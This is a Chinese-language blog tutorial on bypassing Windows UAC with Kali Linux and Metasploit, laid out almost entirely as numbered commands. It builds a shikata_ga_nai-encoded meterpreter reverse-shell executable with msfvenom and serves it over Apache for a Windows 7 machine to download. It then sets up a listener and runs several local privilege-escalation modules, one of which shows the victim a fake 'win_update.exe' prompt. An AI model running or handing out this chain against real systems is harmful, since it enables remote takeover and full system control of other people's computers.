kali 绕过uac提权

1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows LHOST=192.168.2.128 LPORT=4444 -b “x00” -e x86/shikata_ga_nai -i 7 -f exe -o a.exe  –产生一个exe文件

kali 绕过uac提权


2. service apache2 start   –开启apache服务
3. service postgresql start –开启msf数据库服务
4. cp ./a.exe /var/www/html/ –在http目录下

kali 绕过uac提权

5. 打开win7访问kali ip 下载a.exe


kali 绕过uac提权

6. Msfconsole           –启动msf

kali 绕过uac提权

7. use exploit/multi/handler   –使用这个模块

kali 绕过uac提权

8. set payload windows/meterpreter/reverse_tcp  –配置payload


kali 绕过uac提权

9. set lhost 192.168.2.128  –配置kali  ip

kali 绕过uac提权

10. set lport 4444    –配置监听端口 和exe文件端口一样


11. Show options   –查看一下参数

kali 绕过uac提权


12. exploit -j  –开始监听

kali 绕过uac提权

13. 然后在win7电脑上运行a.Exe

kali 绕过uac提权


14. 在kali上就会返回一个会话用sessions 查看


kali 绕过uac提权

15. sessions -i 1  –进入会话

kali 绕过uac提权


16. load priv   –更新插件

kali 绕过uac提权


17. Getsystem  –获取权限  发现没有权限 需要提权

18. Background –退出会话


kali 绕过uac提权

19. use exploit/windows/local/ask –进入提权模块

kali 绕过uac提权


20. show options  –查看配置参数


kali 绕过uac提权

21. set payload windows/meterpreter/reverse_tcp –设置payload
22. set lhost 192.168.2.128  –设置kali ip
23. set filename win_update.exe  –设置win弹窗名字
24. set filename win_update.exe –设置会话
25. show options

kali 绕过uac提权

26. Exploit  –攻击 会多一个会话
27. sessions -i 2  –进入会话
28. load priv 更新插件
29. Getsystem  –提权 

kali 绕过uac提权


–上边那个提权还要弹窗 接下来再说一个模块不需要用户在点击 “是”
30. use exploit/windows/local/bypassuac_injection
31. set payload windows/meterpreter/reverse_tcp
32. Set lhost 192.168.2.128
33. set session 1
34. exploit  –在得到一个提权的会话

35. 还有2个模块可以用提权以下是  模块和payload(参数配置如上)
36. use exploit/windows/local/ms13_053_schlamperei
set payload windows/meterpreter/reverse_tcp
37. use exploit/windows/local/ppr_flatten_rec

set payload windows/meterpreter/reverse_tcp
— set payload windows/viewomly/reverse_tcp

— set viewonly no(这个payload可以用图型话界面 设置viewonly为 no可以操作)

kali 绕过uac提权

你可能喜欢

kali下进行局域网断网攻击

Dradis,Kali渗透测试报告生成器

Kali Linux 2.0下可匿名控制台

kali 绕过uac提权

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容